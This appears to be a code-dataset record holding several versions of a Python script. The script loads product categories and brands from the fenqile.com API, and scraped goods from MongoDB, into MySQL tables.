for category_id, category_name in categories_dict.items():
sql = (
'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'
)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')
result = cursor.execute(sql, (category_id, category_name,
create_time))
conn.commit()
def insert_brand(conn):
"""将商品的品牌插入数据库"""
brand_list = []
category_id_list = [66, 327, 65, 67, 217, 179, 255]
for category_id in category_id_list:
try:
brand_url = (
'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'
)
res = requests.get(brand_url.format(category_id=category_id))
brands = json.loads(res.content.decode('utf-8')).get('brand_list')
brand_list += brands
except:
            print('Error: category_id:', category_id)
print()
continue
key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',
'category_id_1']
sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'
with conn.cursor() as cursor:
brand_set = set()
for brand in brand_list:
brand_id = int(brand.get('brand_id'))
print(brand_id)
if brand_id not in brand_set:
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'
)
brand_name = brand.get('brand_name')
brand_name_ch = brand.get('brand_name_ch') if brand.get(
'brand_name_ch') else brand_name
brand_name_en = brand.get('brand_name_en') if brand.get(
'brand_name_en') else brand_name
category_id = int(brand.get('category_id_1'))
category_id = (category_id if category_id in
category_id_list else 1000)
result = cursor.execute(sql, (brand_id, create_time,
brand_name, brand_name_ch, brand_name_en, category_id))
print(result)
conn.commit()
brand_set.add(brand_id)
def insert_goods(conn, GOODS):
"""将商品信息插入数据库"""
kws = ('product_name', 'category_id_1', 'brand_id', 'product_desc',
'short_product_name', 'sku_key_1', 'sku_key_2', 'sku_key_3',
'product_flag', 'min_firstpay', 'is_product_up_down', 'real_amount',
'mart_amount', 'fq_num', 'product_info', 'delivery_time',
'gift_list', 'fe_params', 'slider_imgs', 'detail_imgs', 'create_time')
sql = (
'insert into goods (good_name,category_id,brand_id,product_name,short_product_name,sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount,mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs,create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'
)
goods = GOODS.find()
for good in goods:
try:
data = []
for kw in kws[:-5]:
info = good['detail_data'].get(kw)
data.append(info)
gift_list = ' '.join([str(s) for s in good['detail_data'].get(
'gift_list')[-1].values()])
data.append(gift_list)
fe_params = json.dumps(good['detail_data'].get('fe_params'))
data.append(fe_params)
slider_imgs = '||'.join(good['slider_imgs'])
data.append(slider_imgs)
detail_imgs = '||'.join(good['detail_imgs'])
data.append(detail_imgs)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')
data.append(create_time)
with conn.cursor() as cursor:
cursor.execute('select brand_id from goods_brand')
all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]
cursor.execute('select category_id from goods_category')
all_category_ids = [category_id[0] for category_id in
cursor.fetchall()]
data[1] = data[1] if data[1] else 1000
data[2] = data[2] if data[2] else 10000
data[1] = 1000 if int(data[1]
) not in all_category_ids else int(data[1])
data[2] = 10000 if int(data[2]) not in all_brand_ids else int(
data[2])
cursor.execute(sql, tuple(data))
conn.commit()
except Exception as e:
print(e)
continue
def main():
conn = pymysql.connect(host='127.0.0.1', port=3306, user='root',
password='123456', db='test', charset='utf8', autocommit=False)
CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)
GOODS = CONN['fenqile']['goods']
insert_goods(conn, GOODS)
conn.close()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import json
import datetime
import requests
import pymysql
import pymongo
def insert_category(conn):
"""将商品的种类插入数据库 """
# 商品种类的 id 和对应的名称
categories_dict = {
66: "手机",
327: "腕表配饰",
65: "电脑办公",
67: "相机单反",
217: "平板数码",
179: "运动户外",
255: "家电家居",
1000: "其他",
}
with conn.cursor() as cursor:
for category_id, category_name in categories_dict.items():
sql = "insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)"
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, "%Y-%m-%d %H:%M:%S")
result = cursor.execute(sql, (category_id, category_name, create_time))
conn.commit()
def insert_brand(conn):
"""将商品的品牌插入数据库"""
brand_list = []
category_id_list = [66, 327, 65, 67, 217, 179, 255]
for category_id in category_id_list:
try:
brand_url = "https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}"
res = requests.get(brand_url.format(category_id=category_id))
            # List made up of all the brand dicts
brands = json.loads(res.content.decode("utf-8")).get("brand_list")
brand_list += brands
except:
print("出错了:category_id:", category_id)
print()
continue
key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en', 'category_id_1']
sql = "insert into goods_brand values (%s, %s, %s, %s, %s, %s)"
with conn.cursor() as cursor:
brand_set = set()
for brand in brand_list:
brand_id = int(brand.get("brand_id"))
print(brand_id)
if brand_id not in brand_set:
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, "%Y-%m-%d %H:%M:%S")
brand_name = brand.get("brand_name")
brand_name_ch = brand.get("brand_name_ch") if brand.get("brand_name_ch") else brand_name
brand_name_en = brand.get("brand_name_en") if brand.get("brand_name_en") else brand_name
category_id = int(brand.get("category_id_1"))
category_id = category_id if category_id in category_id_list else 1000
                # Insert into the database
result = cursor.execute(sql, (brand_id, create_time, brand_name, brand_name_ch, brand_name_en, category_id))
print(result)
conn.commit()
                # Add to the dedup set
brand_set.add(brand_id)
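# Performance aside (an added sketch, not in the original): the row-at-a-time
# loop above could be batched with pymysql's cursor.executemany(sql, rows),
# where rows is a list of parameter tuples, followed by one conn.commit().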
def insert_goods(conn, GOODS):
"""将商品信息插入数据库"""
# 数据库中的所有的字段 22 个
kws = ("product_name", "category_id_1", "brand_id", "product_desc",
"short_product_name", "sku_key_1", "sku_key_2", "sku_key_3", "product_flag",
"min_firstpay", "is_product_up_down", "real_amount", "mart_amount", "fq_num",
"product_info", "delivery_time", "gift_list", "fe_params", "slider_imgs",
"detail_imgs", "create_time")
    # insert every field except the goods id
# sql = "insert into goods () values (%s, %s, %s, %s, %s, " \
# "%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
sql = "insert into goods (good_name,category_id,brand_id,product_name,short_product_name," \
"sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount," \
"mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs," \
"create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
    # fetch the documents from MongoDB
goods = GOODS.find()
for good in goods:
try:
data = []
            # dedup set for goods ids
# good_id_set = set()
for kw in kws[:-5]:
info = good["detail_data"].get(kw)
data.append(info)
            # handle the complex fields separately
gift_list = " ".join([str(s) for s in good["detail_data"].get("gift_list")[-1].values()])
data.append(gift_list)
fe_params = json.dumps(good["detail_data"].get("fe_params"))
data.append(fe_params)
slider_imgs = "||".join(good["slider_imgs"])
data.append(slider_imgs)
detail_imgs = "||".join(good["detail_imgs"])
data.append(detail_imgs)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, "%Y-%m-%d %H:%M:%S")
data.append(create_time)
            # check whether the id is a duplicate
# if good["good_id"] not in good_id_set:
with conn.cursor() as cursor:
cursor.execute("select brand_id from goods_brand")
                # fetch all brand ids
all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]
cursor.execute("select category_id from goods_category")
                # fetch all category ids
all_category_ids = [category_id[0] for category_id in cursor.fetchall()]
data[1] = data[1] if data[1] else 1000
data[2] = data[2] if data[2] else 10000
data[1] = 1000 if int(data[1]) not in all_category_ids else int(data[1])
data[2] = 10000 if int(data[2]) not in all_brand_ids else int(data[2])
cursor.execute(sql, tuple(data))
conn.commit()
# good_id_set.add(good["good_id"])
except Exception as e:
print(e)
continue
def main():
    # MySQL connection
conn = pymysql.connect(host="127.0.0.1", port=3306, user="root", password="123456",
db="test", charset="utf8", autocommit=False)
    # insert the categories into the database
    # insert_category(conn)
    # insert the brands into the database
    # insert_brand(conn)
    # insert the goods into the database
    # MongoDB connection
CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)
GOODS = CONN["fenqile"]["goods"]
insert_goods(conn, GOODS)
conn.close()
if __name__ == "__main__":
main()
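The fallback logic above silently maps unknown or empty category/brand values to the catch-all ids (1000 and 10000). A minimal, self-contained sketch of that normalization; the helper name and the sample id sets are illustrative, not from the original:

def normalize_ids(category_id, brand_id, all_category_ids, all_brand_ids):
    # empty values fall back to the catch-all ids first, then any id
    # missing from the lookup tables is mapped to the same defaults
    category_id = int(category_id) if category_id else 1000
    brand_id = int(brand_id) if brand_id else 10000
    category_id = category_id if category_id in all_category_ids else 1000
    brand_id = brand_id if brand_id in all_brand_ids else 10000
    return category_id, brand_id

# '999' is not a known category and the brand value is empty,
# so both defaults apply
assert normalize_ids('999', None, {66, 327, 65}, {101}) == (1000, 10000)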
|
flexible
|
{
"blob_id": "b69e3f5e57adc8e89b6ff22fb4a10d2539e13ca3",
"index": 7200,
"step-1": "<mask token>\n\n\ndef insert_category(conn):\n \"\"\"将商品的种类插入数据库 \"\"\"\n categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):\n '相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}\n with conn.cursor() as cursor:\n for category_id, category_name in categories_dict.items():\n sql = (\n 'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'\n )\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')\n result = cursor.execute(sql, (category_id, category_name,\n create_time))\n conn.commit()\n\n\ndef insert_brand(conn):\n \"\"\"将商品的品牌插入数据库\"\"\"\n brand_list = []\n category_id_list = [66, 327, 65, 67, 217, 179, 255]\n for category_id in category_id_list:\n try:\n brand_url = (\n 'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'\n )\n res = requests.get(brand_url.format(category_id=category_id))\n brands = json.loads(res.content.decode('utf-8')).get('brand_list')\n brand_list += brands\n except:\n print('出错了:category_id:', category_id)\n print()\n continue\n key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',\n 'category_id_1']\n sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'\n with conn.cursor() as cursor:\n brand_set = set()\n for brand in brand_list:\n brand_id = int(brand.get('brand_id'))\n print(brand_id)\n if brand_id not in brand_set:\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'\n )\n brand_name = brand.get('brand_name')\n brand_name_ch = brand.get('brand_name_ch') if brand.get(\n 'brand_name_ch') else brand_name\n brand_name_en = brand.get('brand_name_en') if brand.get(\n 'brand_name_en') else brand_name\n category_id = int(brand.get('category_id_1'))\n category_id = (category_id if category_id in\n category_id_list else 1000)\n result = cursor.execute(sql, (brand_id, create_time,\n brand_name, brand_name_ch, brand_name_en, category_id))\n print(result)\n conn.commit()\n brand_set.add(brand_id)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef insert_category(conn):\n \"\"\"将商品的种类插入数据库 \"\"\"\n categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):\n '相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}\n with conn.cursor() as cursor:\n for category_id, category_name in categories_dict.items():\n sql = (\n 'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'\n )\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')\n result = cursor.execute(sql, (category_id, category_name,\n create_time))\n conn.commit()\n\n\ndef insert_brand(conn):\n \"\"\"将商品的品牌插入数据库\"\"\"\n brand_list = []\n category_id_list = [66, 327, 65, 67, 217, 179, 255]\n for category_id in category_id_list:\n try:\n brand_url = (\n 'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'\n )\n res = requests.get(brand_url.format(category_id=category_id))\n brands = json.loads(res.content.decode('utf-8')).get('brand_list')\n brand_list += brands\n except:\n print('出错了:category_id:', category_id)\n print()\n continue\n key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',\n 'category_id_1']\n sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'\n with conn.cursor() as cursor:\n brand_set = set()\n for brand in brand_list:\n brand_id = int(brand.get('brand_id'))\n print(brand_id)\n if brand_id not in brand_set:\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'\n )\n brand_name = brand.get('brand_name')\n brand_name_ch = brand.get('brand_name_ch') if brand.get(\n 'brand_name_ch') else brand_name\n brand_name_en = brand.get('brand_name_en') if brand.get(\n 'brand_name_en') else brand_name\n category_id = int(brand.get('category_id_1'))\n category_id = (category_id if category_id in\n category_id_list else 1000)\n result = cursor.execute(sql, (brand_id, create_time,\n brand_name, brand_name_ch, brand_name_en, category_id))\n print(result)\n conn.commit()\n brand_set.add(brand_id)\n\n\ndef insert_goods(conn, GOODS):\n \"\"\"将商品信息插入数据库\"\"\"\n kws = ('product_name', 'category_id_1', 'brand_id', 'product_desc',\n 'short_product_name', 'sku_key_1', 'sku_key_2', 'sku_key_3',\n 'product_flag', 'min_firstpay', 'is_product_up_down', 'real_amount',\n 'mart_amount', 'fq_num', 'product_info', 'delivery_time',\n 'gift_list', 'fe_params', 'slider_imgs', 'detail_imgs', 'create_time')\n sql = (\n 'insert into goods (good_name,category_id,brand_id,product_name,short_product_name,sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount,mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs,create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'\n )\n goods = GOODS.find()\n for good in goods:\n try:\n data = []\n for kw in kws[:-5]:\n info = good['detail_data'].get(kw)\n data.append(info)\n gift_list = ' '.join([str(s) for s in good['detail_data'].get(\n 'gift_list')[-1].values()])\n data.append(gift_list)\n fe_params = json.dumps(good['detail_data'].get('fe_params'))\n data.append(fe_params)\n slider_imgs = '||'.join(good['slider_imgs'])\n data.append(slider_imgs)\n detail_imgs = '||'.join(good['detail_imgs'])\n data.append(detail_imgs)\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')\n data.append(create_time)\n with conn.cursor() as cursor:\n cursor.execute('select 
brand_id from goods_brand')\n all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]\n cursor.execute('select category_id from goods_category')\n all_category_ids = [category_id[0] for category_id in\n cursor.fetchall()]\n data[1] = data[1] if data[1] else 1000\n data[2] = data[2] if data[2] else 10000\n data[1] = 1000 if int(data[1]\n ) not in all_category_ids else int(data[1])\n data[2] = 10000 if int(data[2]) not in all_brand_ids else int(\n data[2])\n cursor.execute(sql, tuple(data))\n conn.commit()\n except Exception as e:\n print(e)\n continue\n\n\ndef main():\n conn = pymysql.connect(host='127.0.0.1', port=3306, user='root',\n password='123456', db='test', charset='utf8', autocommit=False)\n CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)\n GOODS = CONN['fenqile']['goods']\n insert_goods(conn, GOODS)\n conn.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef insert_category(conn):\n \"\"\"将商品的种类插入数据库 \"\"\"\n categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):\n '相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}\n with conn.cursor() as cursor:\n for category_id, category_name in categories_dict.items():\n sql = (\n 'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'\n )\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')\n result = cursor.execute(sql, (category_id, category_name,\n create_time))\n conn.commit()\n\n\ndef insert_brand(conn):\n \"\"\"将商品的品牌插入数据库\"\"\"\n brand_list = []\n category_id_list = [66, 327, 65, 67, 217, 179, 255]\n for category_id in category_id_list:\n try:\n brand_url = (\n 'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'\n )\n res = requests.get(brand_url.format(category_id=category_id))\n brands = json.loads(res.content.decode('utf-8')).get('brand_list')\n brand_list += brands\n except:\n print('出错了:category_id:', category_id)\n print()\n continue\n key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',\n 'category_id_1']\n sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'\n with conn.cursor() as cursor:\n brand_set = set()\n for brand in brand_list:\n brand_id = int(brand.get('brand_id'))\n print(brand_id)\n if brand_id not in brand_set:\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'\n )\n brand_name = brand.get('brand_name')\n brand_name_ch = brand.get('brand_name_ch') if brand.get(\n 'brand_name_ch') else brand_name\n brand_name_en = brand.get('brand_name_en') if brand.get(\n 'brand_name_en') else brand_name\n category_id = int(brand.get('category_id_1'))\n category_id = (category_id if category_id in\n category_id_list else 1000)\n result = cursor.execute(sql, (brand_id, create_time,\n brand_name, brand_name_ch, brand_name_en, category_id))\n print(result)\n conn.commit()\n brand_set.add(brand_id)\n\n\ndef insert_goods(conn, GOODS):\n \"\"\"将商品信息插入数据库\"\"\"\n kws = ('product_name', 'category_id_1', 'brand_id', 'product_desc',\n 'short_product_name', 'sku_key_1', 'sku_key_2', 'sku_key_3',\n 'product_flag', 'min_firstpay', 'is_product_up_down', 'real_amount',\n 'mart_amount', 'fq_num', 'product_info', 'delivery_time',\n 'gift_list', 'fe_params', 'slider_imgs', 'detail_imgs', 'create_time')\n sql = (\n 'insert into goods (good_name,category_id,brand_id,product_name,short_product_name,sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount,mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs,create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'\n )\n goods = GOODS.find()\n for good in goods:\n try:\n data = []\n for kw in kws[:-5]:\n info = good['detail_data'].get(kw)\n data.append(info)\n gift_list = ' '.join([str(s) for s in good['detail_data'].get(\n 'gift_list')[-1].values()])\n data.append(gift_list)\n fe_params = json.dumps(good['detail_data'].get('fe_params'))\n data.append(fe_params)\n slider_imgs = '||'.join(good['slider_imgs'])\n data.append(slider_imgs)\n detail_imgs = '||'.join(good['detail_imgs'])\n data.append(detail_imgs)\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')\n data.append(create_time)\n with conn.cursor() as cursor:\n cursor.execute('select 
brand_id from goods_brand')\n all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]\n cursor.execute('select category_id from goods_category')\n all_category_ids = [category_id[0] for category_id in\n cursor.fetchall()]\n data[1] = data[1] if data[1] else 1000\n data[2] = data[2] if data[2] else 10000\n data[1] = 1000 if int(data[1]\n ) not in all_category_ids else int(data[1])\n data[2] = 10000 if int(data[2]) not in all_brand_ids else int(\n data[2])\n cursor.execute(sql, tuple(data))\n conn.commit()\n except Exception as e:\n print(e)\n continue\n\n\ndef main():\n conn = pymysql.connect(host='127.0.0.1', port=3306, user='root',\n password='123456', db='test', charset='utf8', autocommit=False)\n CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)\n GOODS = CONN['fenqile']['goods']\n insert_goods(conn, GOODS)\n conn.close()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import json\nimport datetime\nimport requests\nimport pymysql\nimport pymongo\n\n\ndef insert_category(conn):\n \"\"\"将商品的种类插入数据库 \"\"\"\n categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):\n '相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}\n with conn.cursor() as cursor:\n for category_id, category_name in categories_dict.items():\n sql = (\n 'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'\n )\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')\n result = cursor.execute(sql, (category_id, category_name,\n create_time))\n conn.commit()\n\n\ndef insert_brand(conn):\n \"\"\"将商品的品牌插入数据库\"\"\"\n brand_list = []\n category_id_list = [66, 327, 65, 67, 217, 179, 255]\n for category_id in category_id_list:\n try:\n brand_url = (\n 'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'\n )\n res = requests.get(brand_url.format(category_id=category_id))\n brands = json.loads(res.content.decode('utf-8')).get('brand_list')\n brand_list += brands\n except:\n print('出错了:category_id:', category_id)\n print()\n continue\n key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',\n 'category_id_1']\n sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'\n with conn.cursor() as cursor:\n brand_set = set()\n for brand in brand_list:\n brand_id = int(brand.get('brand_id'))\n print(brand_id)\n if brand_id not in brand_set:\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'\n )\n brand_name = brand.get('brand_name')\n brand_name_ch = brand.get('brand_name_ch') if brand.get(\n 'brand_name_ch') else brand_name\n brand_name_en = brand.get('brand_name_en') if brand.get(\n 'brand_name_en') else brand_name\n category_id = int(brand.get('category_id_1'))\n category_id = (category_id if category_id in\n category_id_list else 1000)\n result = cursor.execute(sql, (brand_id, create_time,\n brand_name, brand_name_ch, brand_name_en, category_id))\n print(result)\n conn.commit()\n brand_set.add(brand_id)\n\n\ndef insert_goods(conn, GOODS):\n \"\"\"将商品信息插入数据库\"\"\"\n kws = ('product_name', 'category_id_1', 'brand_id', 'product_desc',\n 'short_product_name', 'sku_key_1', 'sku_key_2', 'sku_key_3',\n 'product_flag', 'min_firstpay', 'is_product_up_down', 'real_amount',\n 'mart_amount', 'fq_num', 'product_info', 'delivery_time',\n 'gift_list', 'fe_params', 'slider_imgs', 'detail_imgs', 'create_time')\n sql = (\n 'insert into goods (good_name,category_id,brand_id,product_name,short_product_name,sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount,mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs,create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'\n )\n goods = GOODS.find()\n for good in goods:\n try:\n data = []\n for kw in kws[:-5]:\n info = good['detail_data'].get(kw)\n data.append(info)\n gift_list = ' '.join([str(s) for s in good['detail_data'].get(\n 'gift_list')[-1].values()])\n data.append(gift_list)\n fe_params = json.dumps(good['detail_data'].get('fe_params'))\n data.append(fe_params)\n slider_imgs = '||'.join(good['slider_imgs'])\n data.append(slider_imgs)\n detail_imgs = '||'.join(good['detail_imgs'])\n data.append(detail_imgs)\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')\n 
data.append(create_time)\n with conn.cursor() as cursor:\n cursor.execute('select brand_id from goods_brand')\n all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]\n cursor.execute('select category_id from goods_category')\n all_category_ids = [category_id[0] for category_id in\n cursor.fetchall()]\n data[1] = data[1] if data[1] else 1000\n data[2] = data[2] if data[2] else 10000\n data[1] = 1000 if int(data[1]\n ) not in all_category_ids else int(data[1])\n data[2] = 10000 if int(data[2]) not in all_brand_ids else int(\n data[2])\n cursor.execute(sql, tuple(data))\n conn.commit()\n except Exception as e:\n print(e)\n continue\n\n\ndef main():\n conn = pymysql.connect(host='127.0.0.1', port=3306, user='root',\n password='123456', db='test', charset='utf8', autocommit=False)\n CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)\n GOODS = CONN['fenqile']['goods']\n insert_goods(conn, GOODS)\n conn.close()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\nimport json\nimport datetime\n\nimport requests\nimport pymysql\nimport pymongo\n\n\ndef insert_category(conn):\n \"\"\"将商品的种类插入数据库 \"\"\"\n # 商品种类的 id 和对应的名称\n categories_dict = {\n 66: \"手机\",\n 327: \"腕表配饰\",\n 65: \"电脑办公\",\n 67: \"相机单反\",\n 217: \"平板数码\",\n 179: \"运动户外\",\n 255: \"家电家居\",\n 1000: \"其他\",\n }\n with conn.cursor() as cursor:\n for category_id, category_name in categories_dict.items():\n sql = \"insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)\"\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, \"%Y-%m-%d %H:%M:%S\")\n result = cursor.execute(sql, (category_id, category_name, create_time))\n conn.commit()\n\n\ndef insert_brand(conn):\n \"\"\"将商品的品牌插入数据库\"\"\"\n brand_list = []\n category_id_list = [66, 327, 65, 67, 217, 179, 255]\n for category_id in category_id_list:\n try:\n brand_url = \"https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}\"\n res = requests.get(brand_url.format(category_id=category_id))\n # 所有的brand字典组成的列表\n brands = json.loads(res.content.decode(\"utf-8\")).get(\"brand_list\")\n brand_list += brands\n except:\n print(\"出错了:category_id:\", category_id)\n print()\n continue\n\n key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en', 'category_id_1']\n sql = \"insert into goods_brand values (%s, %s, %s, %s, %s, %s)\"\n with conn.cursor() as cursor:\n brand_set = set()\n for brand in brand_list:\n brand_id = int(brand.get(\"brand_id\"))\n print(brand_id)\n if brand_id not in brand_set:\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, \"%Y-%m-%d %H:%M:%S\")\n brand_name = brand.get(\"brand_name\")\n brand_name_ch = brand.get(\"brand_name_ch\") if brand.get(\"brand_name_ch\") else brand_name\n brand_name_en = brand.get(\"brand_name_en\") if brand.get(\"brand_name_en\") else brand_name\n category_id = int(brand.get(\"category_id_1\"))\n category_id = category_id if category_id in category_id_list else 1000\n # 插入数据库\n result = cursor.execute(sql, (brand_id, create_time, brand_name, brand_name_ch, brand_name_en, category_id))\n print(result)\n conn.commit()\n # 加入去重队列\n brand_set.add(brand_id)\n\n\ndef insert_goods(conn, GOODS):\n \"\"\"将商品信息插入数据库\"\"\"\n # 数据库中的所有的字段 22 个\n kws = (\"product_name\", \"category_id_1\", \"brand_id\", \"product_desc\",\n \"short_product_name\", \"sku_key_1\", \"sku_key_2\", \"sku_key_3\", \"product_flag\",\n \"min_firstpay\", \"is_product_up_down\", \"real_amount\", \"mart_amount\", \"fq_num\",\n \"product_info\", \"delivery_time\", \"gift_list\", \"fe_params\", \"slider_imgs\",\n \"detail_imgs\", \"create_time\")\n # 插入除 商品 id 之外的字段\n # sql = \"insert into goods () values (%s, %s, %s, %s, %s, \" \\\n # \"%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n sql = \"insert into goods (good_name,category_id,brand_id,product_name,short_product_name,\" \\\n \"sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount,\" \\\n \"mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs,\" \\\n \"create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n # 获取mongodb 中的数据\n goods = GOODS.find()\n for good in goods:\n try:\n data = []\n # 商品 id 去重集合\n # good_id_set = set()\n for kw in kws[:-5]:\n info = good[\"detail_data\"].get(kw)\n data.append(info)\n # 单独处理复杂的项目\n gift_list = \" \".join([str(s) for s in 
good[\"detail_data\"].get(\"gift_list\")[-1].values()])\n data.append(gift_list)\n fe_params = json.dumps(good[\"detail_data\"].get(\"fe_params\"))\n data.append(fe_params)\n slider_imgs = \"||\".join(good[\"slider_imgs\"])\n data.append(slider_imgs)\n detail_imgs = \"||\".join(good[\"detail_imgs\"])\n data.append(detail_imgs)\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, \"%Y-%m-%d %H:%M:%S\")\n data.append(create_time)\n # 判断 id 是否重复\n # if good[\"good_id\"] not in good_id_set:\n with conn.cursor() as cursor:\n cursor.execute(\"select brand_id from goods_brand\")\n # 查出所有的品牌 id\n all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]\n cursor.execute(\"select category_id from goods_category\")\n # 查出所有的种类 id\n all_category_ids = [category_id[0] for category_id in cursor.fetchall()]\n data[1] = data[1] if data[1] else 1000\n data[2] = data[2] if data[2] else 10000\n data[1] = 1000 if int(data[1]) not in all_category_ids else int(data[1])\n data[2] = 10000 if int(data[2]) not in all_brand_ids else int(data[2])\n cursor.execute(sql, tuple(data))\n conn.commit()\n # good_id_set.add(good[\"good_id\"])\n except Exception as e:\n print(e)\n continue\n\n\ndef main():\n # MySQL 连接\n conn = pymysql.connect(host=\"127.0.0.1\", port=3306, user=\"root\", password=\"123456\",\n db=\"test\", charset=\"utf8\", autocommit=False)\n # 将分类插入数据库\n # insert_category(conn)\n # 将品牌插入数据库\n # insert_brand(conn)\n # 将商品插入数据库\n # mongodb 连接\n CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)\n GOODS = CONN[\"fenqile\"][\"goods\"]\n insert_goods(conn, GOODS)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()\n",
